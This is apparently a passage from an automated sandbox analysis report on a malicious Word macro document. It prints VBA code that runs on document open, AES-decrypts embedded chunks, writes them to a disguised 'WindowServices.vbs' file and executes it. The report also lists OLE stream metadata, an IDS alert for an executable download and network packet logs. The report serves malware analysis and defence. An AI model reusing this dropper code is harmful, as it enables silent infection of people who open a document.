    part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
    part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
    Dim encryptedText As String
    encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
    decryptedText = AesDecryptString(encryptedText, key)    ' Gi?i m

    ' Kch thu?c c?a m?i ph?n
    chunkSize = 3000  ' Kch thu?c m?i ph?n
    Dim outputFilePath As String
    ' Luu ton b? n?i dung gi?i m vo t?p VBS
    vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

    ' Ghi t?ng ph?n ra t?p
    Open vbsFilePath For Output As #1
    For i = 1 To Len(decryptedText) Step chunkSize
        partText = Mid(decryptedText, i, chunkSize)
        Print #1, partText  ' Ghi t?ng ph?n vo t?p
    Next i
    Close #1

    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run """" & vbsFilePath & """", 1, True


End Sub

Private Sub Class_Initialize()
    
End Sub

        VBA File Name: ksksksksksksks.cls, Stream Size: 1427
        General
        Stream Path:Macros/VBA/ksksksksksksks
        VBA File Name:ksksksksksksks.cls
        Stream Size:1427
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . Y c { A T ` I 7 . W - p L F . . . b . . . . . . . . . . . . . . . . . . . . z r C . . ; . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . .
        Data Raw:01 16 03 00 00 00 01 00 00 b4 03 00 00 e4 00 00 00 12 02 00 00 ff ff ff ff bb 03 00 00 87 04 00 00 00 00 00 00 01 00 00 00 d4 44 a8 d5 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 9f 59 e8 a9 63 fa 7b 41 b8 54 96 60 af 49 ed b2 37 10 57 2d 70 4c ca 46 9f 7f c7 92 11 62 f4 c0 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "ksksksksksksks"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Application.OnTime Now + TimeValue("00:00:01"), "CallTestAES"
End Sub

        Streams

        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
        General
        Stream Path:\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.235956365095031
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:4096
        Entropy:0.2427468033329246
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
        General
        Stream Path:\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:4096
        Entropy:0.4554711108713573
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A D M I N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
        Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00
        Stream Path: 1Table, File Type: data, Stream Size: 7157
        General
        Stream Path:1Table
        CLSID:
        File Type:data
        Stream Size:7157
        Entropy:5.868824855770492
        Base64 Encoded:True
        Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
        Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 549
        General
        Stream Path:Macros/PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:549
        Entropy:5.333604417988887
        Base64 Encoded:True
        Data ASCII:I D = " { 5 5 3 1 6 D 2 6 - E A 2 9 - 4 0 0 1 - B 2 5 9 - 4 4 5 9 D 4 5 6 A 1 F E } " . . D o c u m e n t = k s k s k s k s k s k s k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 3 . . C l a s s = V i e w S e s s i o n . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " 1 0 0 7 4 6 3 5 0 " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 B 9 9 3 1 7 D 6 B 8 1 6 B 8 1 6 B 8 1 6 B 8 1 " . . D P
        Data Raw:49 44 3d 22 7b 35 35 33 31 36 44 32 36 2d 45 41 32 39 2d 34 30 30 31 2d 42 32 35 39 2d 34 34 35 39 44 34 35 36 41 31 46 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 43 6c 61 73 73 3d 56 69 65 77 53 65 73 73 69 6f 6e 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c
        Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 131
        General
        Stream Path:Macros/PROJECTwm
        CLSID:
        File Type:data
        Stream Size:131
        Entropy:3.0376124822172628
        Base64 Encoded:False
        Data ASCII:k s k s k s k s k s k s k s . k . s . k . s . k . s . k . s . k . s . k . s . k . s . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . V i e w S e s s i o n . V . i . e . w . S . e . s . s . i . o . n . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
        Data Raw:6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 56 69 65 77 53 65 73 73 69 6f 6e 00 56 00 69 00 65 00 77 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00
        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 7577
        General
        Stream Path:Macros/VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:7577
        Entropy:5.650269563862988
        Base64 Encoded:True
        Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
        Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 628
        General
        Stream Path:Macros/VBA/dir
        CLSID:
        File Type:data
        Stream Size:628
        Entropy:6.379534074216786
        Base64 Encoded:True
        Data ASCII:. p . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . ? ? = . . . . t . 4 . . . . . . . r i . . . . j < . . . . . . . s t d o l e > . . . s . t . d . o . l . e . . . h . . . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . 0 . . E N o r ( m a l E N C r . m . a F . . . b . . * \\ C . . . . r i . . ! O f f i c g O . f . i . c g . !
        Data Raw:01 70 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 80 3f b4 3f 3d 04 0e 07 02 74 01 34 08 06 12 02 09 02 12 93 ad 72 69 09 00 8a 0c 02 6a 3c 02 0a 16 00 06 00 0e 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 1d 02 5e 00 03 2a 5c 47
        Stream Path: WordDocument, File Type: data, Stream Size: 4096
        General
        Stream Path:WordDocument
        CLSID:
        File Type:data
        Stream Size:4096
        Entropy:1.1027496421550893
        Base64 Encoded:False
        Data ASCII:. U . . . . . . . . . . . . . . . . . . . . . 2 . . . . . b j b j n n . . . . . . . . . . . . . . . . . . . . . . . . . . . a . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . .
        Data Raw:ec a5 c1 00 55 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 32 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

        Network Behavior

        Suricata IDS Alerts

        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
        2025-01-14T16:38:32.692580+01002022640ET MALWARE PE EXE or DLL Windows file download Text M21172.65.251.78443192.168.2.549718TCP

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Jan 14, 2025 16:38:31.787549973 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:31.787610054 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:31.787694931 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:31.796114922 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:31.796129942 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.281590939 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.281668901 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.331965923 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.331995964 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.332444906 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.332566977 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.335756063 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.383323908 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599081993 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599169016 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599267960 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.599294901 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599339962 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.599344969 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599400997 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.599400997 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599423885 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599505901 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.599509954 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599555016 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.599622011 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599678993 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.599683046 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.599725008 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.599947929 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.600019932 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.600294113 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.600298882 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.603108883 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.603842020 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.604814053 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.604818106 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.604859114 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.689888954 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.689999104 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690047979 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690048933 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690068960 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690082073 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690114021 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690118074 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690155983 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690160036 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690207958 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690587997 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690635920 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690639973 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690689087 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690692902 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690732956 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690733910 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690747023 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690776110 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690795898 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.690799952 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.690848112 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.691627979 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.691703081 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.691736937 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.691780090 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.691814899 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.691817045 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.691828012 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.691843033 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.691864014 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.691869020 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.692523003 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.692569017 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.692572117 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.692648888 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.692689896 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.692689896 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.692702055 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.692737103 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.692745924 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.692785978 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.692789078 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.692826986 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.693527937 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.693583012 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.693587065 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.693645954 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.781089067 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.781215906 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.781287909 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.781330109 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.781339884 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.781379938 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.781395912 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.781455994 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.781497002 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.781505108 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.781541109 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.782221079 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.782269001 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.782270908 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.782285929 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.782332897 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.782332897 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.782382011 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.782424927 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.783238888 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.783278942 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.783289909 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.783293962 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.783318996 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.783328056 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.783359051 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.783401966 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.784064054 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.784106016 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.784110069 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.784120083 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.784142971 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.784162045 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.784182072 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.784225941 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.785038948 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.785083055 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.785084963 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.785095930 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.785125017 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.871967077 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872107029 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872133017 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.872148037 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872159004 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.872168064 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872189045 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.872193098 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872205019 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.872230053 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.872431040 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872473955 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.872493982 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872545004 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.872564077 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.872615099 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.873043060 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.873095036 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.873150110 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.873193979 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.873229027 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.873285055 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.873667955 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.873713970 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.873723030 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.873771906 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.873835087 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.873878956 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.873887062 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.873934031 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.874001026 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.874048948 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.874597073 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.874639034 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.874655962 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.874701023 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.874821901 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.874882936 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.874985933 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.875044107 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.875475883 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.875540972 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.875545025 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.875567913 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.875590086 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.875603914 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.875791073 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.875843048 CET49718443192.168.2.5172.65.251.78
        Jan 14, 2025 16:38:32.875844955 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.875860929 CET44349718172.65.251.78192.168.2.5
        Jan 14, 2025 16:38:32.875890970 CET49718443192.168.2.5172.65.251.78
